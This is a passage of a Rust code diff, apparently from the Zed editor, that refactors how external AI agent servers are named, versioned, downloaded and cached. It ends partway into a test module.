ExternalAgentServerName { +impl From<&'static str> for AgentId { fn from(value: &'static str) -> Self { - ExternalAgentServerName(value.into()) + AgentId(value.into()) } } -impl From for SharedString { - fn from(value: ExternalAgentServerName) -> Self { +impl From for SharedString { + fn from(value: AgentId) -> Self { value.0 } } -impl Borrow for ExternalAgentServerName { +impl AsRef for AgentId { + fn as_ref(&self) -> &str { + &self.0 + } +} + +impl std::borrow::Borrow for AgentId { fn borrow(&self) -> &str { &self.0 } @@ -100,18 +118,32 @@ pub trait ExternalAgentServer { fn get_command( &mut self, extra_env: HashMap, - status_tx: Option>, new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task>; + fn version(&self) -> Option<&SharedString> { + None + } + + fn take_new_version_available_tx(&mut self) -> Option>> { + None + } + + fn set_new_version_available_tx(&mut self, _tx: watch::Sender>) {} + + fn as_any(&self) -> &dyn Any; fn as_any_mut(&mut self) -> &mut dyn Any; } -impl dyn ExternalAgentServer { - fn downcast_mut(&mut self) -> Option<&mut T> { - self.as_any_mut().downcast_mut() - } +struct ExtensionAgentEntry { + agent_name: Arc, + extension_id: String, + targets: HashMap, + env: HashMap, + icon_path: Option, + display_name: Option, + version: Option, } enum AgentServerStoreState { @@ -122,19 +154,13 @@ enum AgentServerStoreState { downstream_client: Option<(u64, AnyProtoClient)>, settings: Option, http_client: Arc, - extension_agents: Vec<( - Arc, - String, - HashMap, - HashMap, - Option, - Option, - )>, + extension_agents: Vec, _subscriptions: Vec, }, Remote { project_id: u64, upstream_client: Entity, + worktree_store: Entity, }, Collab, } @@ -164,7 +190,7 @@ impl ExternalAgentEntry { pub struct AgentServerStore { state: AgentServerStoreState, - pub external_agents: HashMap, + pub external_agents: HashMap, } pub struct AgentServersUpdated; @@ -202,14 +228,15 @@ impl AgentServerStore { resolve_extension_icon_path(&extensions_dir, ext_id, icon) }); 
- extension_agents.push(( - agent_name.clone(), - ext_id.to_owned(), - agent_entry.targets.clone(), - agent_entry.env.clone(), + extension_agents.push(ExtensionAgentEntry { + agent_name: agent_name.clone(), + extension_id: ext_id.to_owned(), + targets: agent_entry.targets.clone(), + env: agent_entry.env.clone(), icon_path, - Some(display_name), - )); + display_name: Some(display_name), + version: Some(SharedString::from(manifest.version.clone())), + }); } } self.reregister_agents(cx); @@ -217,6 +244,7 @@ impl AgentServerStore { AgentServerStoreState::Remote { project_id, upstream_client, + worktree_store, } => { let mut agents = vec![]; for (ext_id, manifest) in manifests { @@ -229,7 +257,7 @@ impl AgentServerStore { .as_ref() .map(|path| SharedString::from(path.clone())); let icon = icon_path; - let agent_server_name = ExternalAgentServerName(agent_name.clone().into()); + let agent_server_name = AgentId(agent_name.clone().into()); self.external_agents .entry(agent_server_name.clone()) .and_modify(|entry| { @@ -242,8 +270,8 @@ impl AgentServerStore { Box::new(RemoteExternalAgentServer { project_id: *project_id, upstream_client: upstream_client.clone(), + worktree_store: worktree_store.clone(), name: agent_server_name.clone(), - status_tx: None, new_version_available_tx: None, }) as Box, @@ -267,6 +295,7 @@ impl AgentServerStore { .iter() .map(|(k, v)| (k.clone(), v.clone())) .collect(), + version: Some(manifest.version.to_string()), }); } } @@ -287,13 +316,13 @@ impl AgentServerStore { cx.emit(AgentServersUpdated); } - pub fn agent_icon(&self, name: &ExternalAgentServerName) -> Option { + pub fn agent_icon(&self, id: &AgentId) -> Option { self.external_agents - .get(name) + .get(id) .and_then(|entry| entry.icon.clone()) } - pub fn agent_source(&self, name: &ExternalAgentServerName) -> Option { + pub fn agent_source(&self, name: &AgentId) -> Option { self.external_agents.get(name).map(|entry| entry.source) } } @@ -339,7 +368,7 @@ pub fn resolve_extension_icon_path( 
} impl AgentServerStore { - pub fn agent_display_name(&self, name: &ExternalAgentServerName) -> Option { + pub fn agent_display_name(&self, name: &AgentId) -> Option { self.external_agents .get(name) .and_then(|entry| entry.display_name.clone()) @@ -347,7 +376,6 @@ impl AgentServerStore { pub fn init_remote(session: &AnyProtoClient) { session.add_entity_message_handler(Self::handle_external_agents_updated); - session.add_entity_message_handler(Self::handle_loading_status_updated); session.add_entity_message_handler(Self::handle_new_version_available); } @@ -423,15 +451,28 @@ impl AgentServerStore { }) .unwrap_or_default(); - self.external_agents.clear(); + // Drain the existing versioned agents, extracting reconnect state + // from any active connection so we can preserve it or trigger a + // reconnect when the version changes. + let mut old_versioned_agents: HashMap< + AgentId, + (SharedString, watch::Sender>), + > = HashMap::default(); + for (name, mut entry) in self.external_agents.drain() { + if let Some(version) = entry.server.version().cloned() { + if let Some(tx) = entry.server.take_new_version_available_tx() { + old_versioned_agents.insert(name, (version, tx)); + } + } + } // Insert extension agents before custom/registry so registry entries override extensions. - for (agent_name, ext_id, targets, env, icon_path, display_name) in extension_agents.iter() { - let name = ExternalAgentServerName(agent_name.clone().into()); - let mut env = env.clone(); + for entry in extension_agents.iter() { + let name = AgentId(entry.agent_name.clone().into()); + let mut env = entry.env.clone(); if let Some(settings_env) = new_settings - .get(agent_name.as_ref()) + .get(entry.agent_name.as_ref()) .and_then(|settings| match settings { CustomAgentServerSettings::Extension { env, .. 
} => Some(env.clone()), _ => None, @@ -439,7 +480,8 @@ impl AgentServerStore { { env.extend(settings_env); } - let icon = icon_path + let icon = entry + .icon_path .as_ref() .map(|path| SharedString::from(path.clone())); @@ -451,14 +493,16 @@ impl AgentServerStore { http_client: http_client.clone(), node_runtime: node_runtime.clone(), project_environment: project_environment.clone(), - extension_id: Arc::from(&**ext_id), - targets: targets.clone(), + extension_id: Arc::from(&*entry.extension_id), + targets: entry.targets.clone(), env, - agent_id: agent_name.clone(), + agent_id: entry.agent_name.clone(), + version: entry.version.clone(), + new_version_available_tx: None, }) as Box, ExternalAgentSource::Extension, icon, - display_name.clone(), + entry.display_name.clone(), ), ); } @@ -466,7 +510,7 @@ impl AgentServerStore { for (name, settings) in new_settings.iter() { match settings { CustomAgentServerSettings::Custom { command, .. } => { - let agent_name = ExternalAgentServerName(name.clone().into()); + let agent_name = AgentId(name.clone().into()); self.external_agents.insert( agent_name.clone(), ExternalAgentEntry::new( @@ -488,7 +532,7 @@ impl AgentServerStore { continue; }; - let agent_name = ExternalAgentServerName(name.clone().into()); + let agent_name = AgentId(name.clone().into()); match agent { RegistryAgent::Binary(agent) => { if !agent.supports_current_platform { @@ -508,8 +552,10 @@ impl AgentServerStore { node_runtime: node_runtime.clone(), project_environment: project_environment.clone(), registry_id: Arc::from(name.as_str()), + version: agent.metadata.version.clone(), targets: agent.targets.clone(), env: env.clone(), + new_version_available_tx: None, }) as Box, ExternalAgentSource::Registry, @@ -525,10 +571,12 @@ impl AgentServerStore { Box::new(LocalRegistryNpxAgent { node_runtime: node_runtime.clone(), project_environment: project_environment.clone(), + version: agent.metadata.version.clone(), package: agent.package.clone(), args: 
agent.args.clone(), distribution_env: agent.env.clone(), settings_env: env.clone(), + new_version_available_tx: None, }) as Box, ExternalAgentSource::Registry, @@ -543,6 +591,24 @@ impl AgentServerStore { } } + // For each rebuilt versioned agent, compare the version. If it + // changed, notify the active connection to reconnect. Otherwise, + // transfer the channel to the new entry so future updates can use it. + for (name, entry) in &mut self.external_agents { + let Some((old_version, mut tx)) = old_versioned_agents.remove(name) else { + continue; + }; + let Some(new_version) = entry.server.version() else { + continue; + }; + + if new_version != &old_version { + tx.send(Some(new_version.to_string())).ok(); + } else { + entry.server.set_new_version_available_tx(tx); + } + } + *old_settings = Some(new_settings); if let Some((project_id, downstream_client)) = downstream_client { @@ -600,11 +666,16 @@ impl AgentServerStore { this } - pub(crate) fn remote(project_id: u64, upstream_client: Entity) -> Self { + pub(crate) fn remote( + project_id: u64, + upstream_client: Entity, + worktree_store: Entity, + ) -> Self { Self { state: AgentServerStoreState::Remote { project_id, upstream_client, + worktree_store, }, external_agents: HashMap::default(), } @@ -653,7 +724,7 @@ impl AgentServerStore { pub fn get_external_agent( &mut self, - name: &ExternalAgentServerName, + name: &AgentId, ) -> Option<&mut (dyn ExternalAgentServer + 'static)> { self.external_agents .get_mut(name) @@ -671,7 +742,11 @@ impl AgentServerStore { } } - pub fn external_agents(&self) -> impl Iterator { + pub fn has_external_agents(&self) -> bool { + !self.external_agents.is_empty() + } + + pub fn external_agents(&self) -> impl Iterator { self.external_agents.keys() } @@ -695,57 +770,38 @@ impl AgentServerStore { .get_mut(&*envelope.payload.name) .map(|entry| entry.server.as_mut()) .with_context(|| format!("agent `{}` not found", envelope.payload.name))?; - let (status_tx, new_version_available_tx) = 
downstream_client - .clone() - .map(|(project_id, downstream_client)| { - let (status_tx, mut status_rx) = watch::channel(SharedString::from("")); - let (new_version_available_tx, mut new_version_available_rx) = - watch::channel(None); - cx.spawn({ - let downstream_client = downstream_client.clone(); - let name = envelope.payload.name.clone(); - async move |_, _| { - while let Some(status) = status_rx.recv().await.ok() { - downstream_client.send( - proto::ExternalAgentLoadingStatusUpdated { - project_id, - name: name.clone(), - status: status.to_string(), - }, - )?; + let new_version_available_tx = + downstream_client + .clone() + .map(|(project_id, downstream_client)| { + let (new_version_available_tx, mut new_version_available_rx) = + watch::channel(None); + cx.spawn({ + let name = envelope.payload.name.clone(); + async move |_, _| { + if let Some(version) = + new_version_available_rx.recv().await.ok().flatten() + { + downstream_client.send( + proto::NewExternalAgentVersionAvailable { + project_id, + name: name.clone(), + version, + }, + )?; + } + anyhow::Ok(()) } - anyhow::Ok(()) - } - }) - .detach_and_log_err(cx); - cx.spawn({ - let name = envelope.payload.name.clone(); - async move |_, _| { - if let Some(version) = - new_version_available_rx.recv().await.ok().flatten() - { - downstream_client.send( - proto::NewExternalAgentVersionAvailable { - project_id, - name: name.clone(), - version, - }, - )?; - } - anyhow::Ok(()) - } - }) - .detach_and_log_err(cx); - (status_tx, new_version_available_tx) - }) - .unzip(); + }) + .detach_and_log_err(cx); + new_version_available_tx + }); let mut extra_env = HashMap::default(); if no_browser { extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned()); } anyhow::Ok(agent.get_command( extra_env, - status_tx, new_version_available_tx, &mut cx.to_async(), )) @@ -758,8 +814,10 @@ impl AgentServerStore { .env .map(|env| env.into_iter().collect()) .unwrap_or_default(), - // root_dir and login are no longer used, but returned for 
backwards compatibility - root_dir: paths::home_dir().to_string_lossy().to_string(), + root_dir: envelope + .payload + .root_dir + .unwrap_or_else(|| paths::home_dir().to_string_lossy().to_string()), login: None, }) } @@ -773,6 +831,7 @@ impl AgentServerStore { let AgentServerStoreState::Remote { project_id, upstream_client, + worktree_store, } = &this.state else { debug_panic!( @@ -782,15 +841,12 @@ impl AgentServerStore { }; let mut previous_entries = std::mem::take(&mut this.external_agents); - let mut status_txs = HashMap::default(); let mut new_version_available_txs = HashMap::default(); let mut metadata = HashMap::default(); for (name, mut entry) in previous_entries.drain() { - if let Some(agent) = entry.server.downcast_mut::() { - status_txs.insert(name.clone(), agent.status_tx.take()); - new_version_available_txs - .insert(name.clone(), agent.new_version_available_tx.take()); + if let Some(tx) = entry.server.take_new_version_available_tx() { + new_version_available_txs.insert(name.clone(), tx); } metadata.insert(name, (entry.icon, entry.display_name, entry.source)); @@ -801,12 +857,12 @@ impl AgentServerStore { .names .into_iter() .map(|name| { - let agent_name = ExternalAgentServerName(name.into()); + let agent_id = AgentId(name.into()); let (icon, display_name, source) = metadata - .remove(&agent_name) + .remove(&agent_id) .or_else(|| { AgentRegistryStore::try_global(cx) - .and_then(|store| store.read(cx).agent(&agent_name.0)) + .and_then(|store| store.read(cx).agent(&agent_id)) .map(|s| { ( s.icon_path().cloned(), @@ -819,14 +875,12 @@ impl AgentServerStore { let agent = RemoteExternalAgentServer { project_id: *project_id, upstream_client: upstream_client.clone(), - name: agent_name.clone(), - status_tx: status_txs.remove(&agent_name).flatten(), - new_version_available_tx: new_version_available_txs - .remove(&agent_name) - .flatten(), + worktree_store: worktree_store.clone(), + name: agent_id.clone(), + new_version_available_tx: 
new_version_available_txs.remove(&agent_id), }; ( - agent_name, + agent_id, ExternalAgentEntry::new( Box::new(agent) as Box, source, @@ -857,25 +911,28 @@ impl AgentServerStore { ); }; + extension_agents.clear(); for ExternalExtensionAgent { name, icon_path, extension_id, targets, env, + version, } in envelope.payload.agents { - extension_agents.push(( - Arc::from(&*name), + extension_agents.push(ExtensionAgentEntry { + agent_name: Arc::from(&*name), extension_id, - targets + targets: targets .into_iter() .map(|(k, v)| (k, extension::TargetConfig::from_proto(v))) .collect(), - env.into_iter().collect(), + env: env.into_iter().collect(), icon_path, - None, - )); + display_name: None, + version: version.map(SharedString::from), + }); } this.reregister_agents(cx); @@ -884,48 +941,27 @@ impl AgentServerStore { }) } - async fn handle_loading_status_updated( - this: Entity, - envelope: TypedEnvelope, - mut cx: AsyncApp, - ) -> Result<()> { - this.update(&mut cx, |this, _| { - if let Some(agent) = this.external_agents.get_mut(&*envelope.payload.name) - && let Some(agent) = agent.server.downcast_mut::() - && let Some(status_tx) = &mut agent.status_tx - { - status_tx.send(envelope.payload.status.into()).ok(); - } - }); - Ok(()) - } - async fn handle_new_version_available( this: Entity, envelope: TypedEnvelope, mut cx: AsyncApp, ) -> Result<()> { this.update(&mut cx, |this, _| { - if let Some(agent) = this.external_agents.get_mut(&*envelope.payload.name) - && let Some(agent) = agent.server.downcast_mut::() - && let Some(new_version_available_tx) = &mut agent.new_version_available_tx + if let Some(entry) = this.external_agents.get_mut(&*envelope.payload.name) + && let Some(mut tx) = entry.server.take_new_version_available_tx() { - new_version_available_tx - .send(Some(envelope.payload.version)) - .ok(); + tx.send(Some(envelope.payload.version)).ok(); + entry.server.set_new_version_available_tx(tx); } }); Ok(()) } - pub fn get_extension_id_for_agent( - &mut self, - name: 
&ExternalAgentServerName, - ) -> Option> { - self.external_agents.get_mut(name).and_then(|entry| { + pub fn get_extension_id_for_agent(&self, name: &AgentId) -> Option> { + self.external_agents.get(name).and_then(|entry| { entry .server - .as_any_mut() + .as_any() .downcast_ref::() .map(|ext_agent| ext_agent.extension_id.clone()) }) @@ -935,25 +971,39 @@ impl AgentServerStore { struct RemoteExternalAgentServer { project_id: u64, upstream_client: Entity, - name: ExternalAgentServerName, - status_tx: Option>, + worktree_store: Entity, + name: AgentId, new_version_available_tx: Option>>, } impl ExternalAgentServer for RemoteExternalAgentServer { + fn take_new_version_available_tx(&mut self) -> Option>> { + self.new_version_available_tx.take() + } + + fn set_new_version_available_tx(&mut self, tx: watch::Sender>) { + self.new_version_available_tx = Some(tx); + } + fn get_command( &mut self, extra_env: HashMap, - status_tx: Option>, new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { let project_id = self.project_id; let name = self.name.to_string(); let upstream_client = self.upstream_client.downgrade(); - self.status_tx = status_tx; + let worktree_store = self.worktree_store.clone(); self.new_version_available_tx = new_version_available_tx; cx.spawn(async move |cx| { + let root_dir = worktree_store.read_with(cx, |worktree_store, cx| { + crate::Project::default_visible_worktree_paths(worktree_store, cx) + .into_iter() + .next() + .map(|path| path.display().to_string()) + }); + let mut response = upstream_client .update(cx, |upstream_client, _| { upstream_client @@ -961,7 +1011,7 @@ impl ExternalAgentServer for RemoteExternalAgentServer { .request(proto::GetAgentServerCommand { project_id, name, - root_dir: None, + root_dir, }) })? 
.await?; @@ -985,11 +1035,106 @@ impl ExternalAgentServer for RemoteExternalAgentServer { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } } +fn asset_kind_for_archive_url(archive_url: &str) -> Result { + let archive_path = Url::parse(archive_url) + .ok() + .map(|url| url.path().to_string()) + .unwrap_or_else(|| archive_url.to_string()); + + if archive_path.ends_with(".zip") { + Ok(AssetKind::Zip) + } else if archive_path.ends_with(".tar.gz") || archive_path.ends_with(".tgz") { + Ok(AssetKind::TarGz) + } else if archive_path.ends_with(".tar.bz2") || archive_path.ends_with(".tbz2") { + Ok(AssetKind::TarBz2) + } else { + bail!("unsupported archive type in URL: {archive_url}"); + } +} + +struct GithubReleaseArchive { + repo_name_with_owner: String, + tag: String, + asset_name: String, +} + +fn github_release_archive_from_url(archive_url: &str) -> Option { + fn decode_path_segment(segment: &str) -> Option { + percent_decode_str(segment) + .decode_utf8() + .ok() + .map(|segment| segment.into_owned()) + } + + let url = Url::parse(archive_url).ok()?; + if url.scheme() != "https" || url.host_str()? != "github.com" { + return None; + } + + let segments = url.path_segments()?.collect::>(); + if segments.len() < 6 || segments[2] != "releases" || segments[3] != "download" { + return None; + } + + Some(GithubReleaseArchive { + repo_name_with_owner: format!("{}/{}", segments[0], segments[1]), + tag: decode_path_segment(segments[4])?, + asset_name: segments[5..] + .iter() + .map(|segment| decode_path_segment(segment)) + .collect::>>()? + .join("/"), + }) +} + +fn sanitized_version_component(version: &str) -> String { + let sanitized = version + .chars() + .map(|character| match character { + 'a'..='z' | 'A'..='Z' | '0'..='9' | '.' 
| '_' | '-' => character, + _ => '-', + }) + .collect::(); + + if sanitized.is_empty() { + "unknown".to_string() + } else { + sanitized + } +} + +fn versioned_archive_cache_dir( + base_dir: &Path, + version: Option<&str>, + archive_url: &str, +) -> PathBuf { + let version = version.unwrap_or_default(); + let sanitized_version = sanitized_version_component(version); + + let mut version_hasher = Sha256::new(); + version_hasher.update(version.as_bytes()); + let version_hash = format!("{:x}", version_hasher.finalize()); + + let mut url_hasher = Sha256::new(); + url_hasher.update(archive_url.as_bytes()); + let url_hash = format!("{:x}", url_hasher.finalize()); + + base_dir.join(format!( + "v_{sanitized_version}_{}_{}", + &version_hash[..16], + &url_hash[..16], + )) +} + pub struct LocalExtensionArchiveAgent { pub fs: Arc, pub http_client: Arc, @@ -999,16 +1144,30 @@ pub struct LocalExtensionArchiveAgent { pub agent_id: Arc, pub targets: HashMap, pub env: HashMap, + pub version: Option, + pub new_version_available_tx: Option>>, } impl ExternalAgentServer for LocalExtensionArchiveAgent { + fn version(&self) -> Option<&SharedString> { + self.version.as_ref() + } + + fn take_new_version_available_tx(&mut self) -> Option>> { + self.new_version_available_tx.take() + } + + fn set_new_version_available_tx(&mut self, tx: watch::Sender>) { + self.new_version_available_tx = Some(tx); + } + fn get_command( &mut self, extra_env: HashMap, - _status_tx: Option>, - _new_version_available_tx: Option>>, + new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { + self.new_version_available_tx = new_version_available_tx; let fs = self.fs.clone(); let http_client = self.http_client.clone(); let node_runtime = self.node_runtime.clone(); @@ -1017,16 +1176,13 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent { let agent_id = self.agent_id.clone(); let targets = self.targets.clone(); let base_env = self.env.clone(); + let version = self.version.clone(); cx.spawn(async move 
|cx| { // Get project environment let mut env = project_environment .update(cx, |project_environment, cx| { - project_environment.local_directory_environment( - &Shell::System, - paths::home_dir().as_path().into(), - cx, - ) + project_environment.default_environment(cx) })? .await .unwrap_or_default(); @@ -1072,56 +1228,38 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent { })?; let archive_url = &target_config.archive; - - // Use URL as version identifier for caching - // Hash the URL to get a stable directory name - use std::collections::hash_map::DefaultHasher; - use std::hash::{Hash, Hasher}; - let mut hasher = DefaultHasher::new(); - archive_url.hash(&mut hasher); - let url_hash = hasher.finish(); - let version_dir = dir.join(format!("v_{:x}", url_hash)); + let version_dir = versioned_archive_cache_dir( + &dir, + version.as_ref().map(|version| version.as_ref()), + archive_url, + ); if !fs.is_dir(&version_dir).await { // Determine SHA256 for verification let sha256 = if let Some(provided_sha) = &target_config.sha256 { // Use provided SHA256 Some(provided_sha.clone()) - } else if archive_url.starts_with("https://github.com/") { + } else if let Some(github_archive) = github_release_archive_from_url(archive_url) { // Try to fetch SHA256 from GitHub API - // Parse URL to extract repo and tag/file info - // Format: https://github.com/owner/repo/releases/download/tag/file.zip - if let Some(caps) = archive_url.strip_prefix("https://github.com/") { - let parts: Vec<&str> = caps.split('/').collect(); - if parts.len() >= 6 && parts[2] == "releases" && parts[3] == "download" { - let repo = format!("{}/{}", parts[0], parts[1]); - let tag = parts[4]; - let filename = parts[5..].join("/"); - - // Try to get release info from GitHub - if let Ok(release) = ::http_client::github::get_release_by_tag_name( - &repo, - tag, - http_client.clone(), - ) - .await - { - // Find matching asset - if let Some(asset) = - release.assets.iter().find(|a| a.name == filename) - { - // 
Strip "sha256:" prefix if present - asset.digest.as_ref().map(|d| { - d.strip_prefix("sha256:") - .map(|s| s.to_string()) - .unwrap_or_else(|| d.clone()) - }) - } else { - None - } - } else { - None - } + if let Ok(release) = ::http_client::github::get_release_by_tag_name( + &github_archive.repo_name_with_owner, + &github_archive.tag, + http_client.clone(), + ) + .await + { + // Find matching asset + if let Some(asset) = release + .assets + .iter() + .find(|a| a.name == github_archive.asset_name) + { + // Strip "sha256:" prefix if present + asset.digest.as_ref().map(|d| { + d.strip_prefix("sha256:") + .map(|s| s.to_string()) + .unwrap_or_else(|| d.clone()) + }) } else { None } @@ -1132,14 +1270,7 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent { None }; - // Determine archive type from URL - let asset_kind = if archive_url.ends_with(".zip") { - AssetKind::Zip - } else if archive_url.ends_with(".tar.gz") || archive_url.ends_with(".tgz") { - AssetKind::TarGz - } else { - anyhow::bail!("unsupported archive type in URL: {}", archive_url); - }; + let asset_kind = asset_kind_for_archive_url(archive_url)?; // Download and extract ::http_client::github_download::download_server_binary( @@ -1188,6 +1319,10 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -1199,18 +1334,32 @@ struct LocalRegistryArchiveAgent { node_runtime: NodeRuntime, project_environment: Entity, registry_id: Arc, + version: SharedString, targets: HashMap, env: HashMap, + new_version_available_tx: Option>>, } impl ExternalAgentServer for LocalRegistryArchiveAgent { + fn version(&self) -> Option<&SharedString> { + Some(&self.version) + } + + fn take_new_version_available_tx(&mut self) -> Option>> { + self.new_version_available_tx.take() + } + + fn set_new_version_available_tx(&mut self, tx: watch::Sender>) { + self.new_version_available_tx = Some(tx); + } + fn get_command( &mut 
self, extra_env: HashMap, - _status_tx: Option>, - _new_version_available_tx: Option>>, + new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { + self.new_version_available_tx = new_version_available_tx; let fs = self.fs.clone(); let http_client = self.http_client.clone(); let node_runtime = self.node_runtime.clone(); @@ -1218,15 +1367,12 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { let registry_id = self.registry_id.clone(); let targets = self.targets.clone(); let settings_env = self.env.clone(); + let version = self.version.clone(); cx.spawn(async move |cx| { let mut env = project_environment .update(cx, |project_environment, cx| { - project_environment.local_directory_environment( - &Shell::System, - paths::home_dir().as_path().into(), - cx, - ) + project_environment.default_environment(cx) })? .await .unwrap_or_default(); @@ -1272,46 +1418,30 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { env.extend(settings_env); let archive_url = &target_config.archive; - - use std::collections::hash_map::DefaultHasher; - use std::hash::{Hash, Hasher}; - let mut hasher = DefaultHasher::new(); - archive_url.hash(&mut hasher); - let url_hash = hasher.finish(); - let version_dir = dir.join(format!("v_{:x}", url_hash)); + let version_dir = + versioned_archive_cache_dir(&dir, Some(version.as_ref()), archive_url); if !fs.is_dir(&version_dir).await { let sha256 = if let Some(provided_sha) = &target_config.sha256 { Some(provided_sha.clone()) - } else if archive_url.starts_with("https://github.com/") { - if let Some(caps) = archive_url.strip_prefix("https://github.com/") { - let parts: Vec<&str> = caps.split('/').collect(); - if parts.len() >= 6 && parts[2] == "releases" && parts[3] == "download" { - let repo = format!("{}/{}", parts[0], parts[1]); - let tag = parts[4]; - let filename = parts[5..].join("/"); - - if let Ok(release) = ::http_client::github::get_release_by_tag_name( - &repo, - tag, - http_client.clone(), - ) - .await - { - if let 
Some(asset) = - release.assets.iter().find(|a| a.name == filename) - { - asset.digest.as_ref().and_then(|d| { - d.strip_prefix("sha256:") - .map(|s| s.to_string()) - .or_else(|| Some(d.clone())) - }) - } else { - None - } - } else { - None - } + } else if let Some(github_archive) = github_release_archive_from_url(archive_url) { + if let Ok(release) = ::http_client::github::get_release_by_tag_name( + &github_archive.repo_name_with_owner, + &github_archive.tag, + http_client.clone(), + ) + .await + { + if let Some(asset) = release + .assets + .iter() + .find(|a| a.name == github_archive.asset_name) + { + asset.digest.as_ref().and_then(|d| { + d.strip_prefix("sha256:") + .map(|s| s.to_string()) + .or_else(|| Some(d.clone())) + }) } else { None } @@ -1322,13 +1452,7 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { None }; - let asset_kind = if archive_url.ends_with(".zip") { - AssetKind::Zip - } else if archive_url.ends_with(".tar.gz") || archive_url.ends_with(".tgz") { - AssetKind::TarGz - } else { - anyhow::bail!("unsupported archive type in URL: {}", archive_url); - }; + let asset_kind = asset_kind_for_archive_url(archive_url)?; ::http_client::github_download::download_server_binary( &*http_client, @@ -1372,6 +1496,10 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -1380,20 +1508,34 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { struct LocalRegistryNpxAgent { node_runtime: NodeRuntime, project_environment: Entity, + version: SharedString, package: SharedString, args: Vec, distribution_env: HashMap, settings_env: HashMap, + new_version_available_tx: Option>>, } impl ExternalAgentServer for LocalRegistryNpxAgent { + fn version(&self) -> Option<&SharedString> { + Some(&self.version) + } + + fn take_new_version_available_tx(&mut self) -> Option>> { + self.new_version_available_tx.take() + } + + fn set_new_version_available_tx(&mut 
self, tx: watch::Sender>) { + self.new_version_available_tx = Some(tx); + } + fn get_command( &mut self, extra_env: HashMap, - _status_tx: Option>, - _new_version_available_tx: Option>>, + new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { + self.new_version_available_tx = new_version_available_tx; let node_runtime = self.node_runtime.clone(); let project_environment = self.project_environment.downgrade(); let package = self.package.clone(); @@ -1404,22 +1546,13 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { cx.spawn(async move |cx| { let mut env = project_environment .update(cx, |project_environment, cx| { - project_environment.local_directory_environment( - &Shell::System, - paths::home_dir().as_path().into(), - cx, - ) + project_environment.default_environment(cx) })? .await .unwrap_or_default(); - let mut exec_args = Vec::new(); - exec_args.push("--yes".to_string()); - exec_args.push(package.to_string()); - if !args.is_empty() { - exec_args.push("--".to_string()); - exec_args.extend(args); - } + let mut exec_args = vec!["--yes".to_string(), "--".to_string(), package.to_string()]; + exec_args.extend(args); let npm_command = node_runtime .npm_command( @@ -1443,6 +1576,10 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -1457,7 +1594,6 @@ impl ExternalAgentServer for LocalCustomAgent { fn get_command( &mut self, extra_env: HashMap, - _status_tx: Option>, _new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { @@ -1466,11 +1602,7 @@ impl ExternalAgentServer for LocalCustomAgent { cx.spawn(async move |cx| { let mut env = project_environment .update(cx, |project_environment, cx| { - project_environment.local_directory_environment( - &Shell::System, - paths::home_dir().as_path().into(), - cx, - ) + project_environment.default_environment(cx) })? 
.await .unwrap_or_default(); @@ -1481,15 +1613,15 @@ impl ExternalAgentServer for LocalCustomAgent { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } } -pub const GEMINI_NAME: &str = "gemini"; -pub const CLAUDE_AGENT_NAME: &str = "claude-acp"; -pub const CODEX_NAME: &str = "codex-acp"; - #[derive(Default, Clone, JsonSchema, Debug, PartialEq, RegisterSetting)] pub struct AllAgentServersSettings(pub HashMap); @@ -1763,3 +1895,339 @@ impl settings::Settings for AllAgentServersSettings { ) } } + +#[cfg(test)] +mod tests { + use super::*; + use crate::agent_registry_store::{ + AgentRegistryStore, RegistryAgent, RegistryAgentMetadata, RegistryNpxAgent, + }; + use crate::worktree_store::{WorktreeIdCounter, WorktreeStore}; + use gpui::{AppContext as _, TestAppContext}; + use node_runtime::NodeRuntime; + use settings::Settings as _; + + fn make_npx_agent(id: &str, version: &str) -> RegistryAgent { + let id = SharedString::from(id.to_string()); + RegistryAgent::Npx(RegistryNpxAgent { + metadata: RegistryAgentMetadata { + id: AgentId::new(id.clone()), + name: id.clone(), + description: SharedString::from(""), + version: SharedString::from(version.to_string()), + repository: None, + website: None, + icon_path: None, + }, + package: id, + args: Vec::new(), + env: HashMap::default(), + }) + } + + fn init_test_settings(cx: &mut TestAppContext) { + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + }); + } + + fn init_registry( + cx: &mut TestAppContext, + agents: Vec, + ) -> gpui::Entity { + cx.update(|cx| AgentRegistryStore::init_test_global(cx, agents)) + } + + fn set_registry_settings(cx: &mut TestAppContext, agent_names: &[&str]) { + cx.update(|cx| { + AllAgentServersSettings::override_global( + AllAgentServersSettings( + agent_names + .iter() + .map(|name| { + ( + name.to_string(), + settings::CustomAgentServerSettings::Registry { + env: HashMap::default(), + default_mode: 
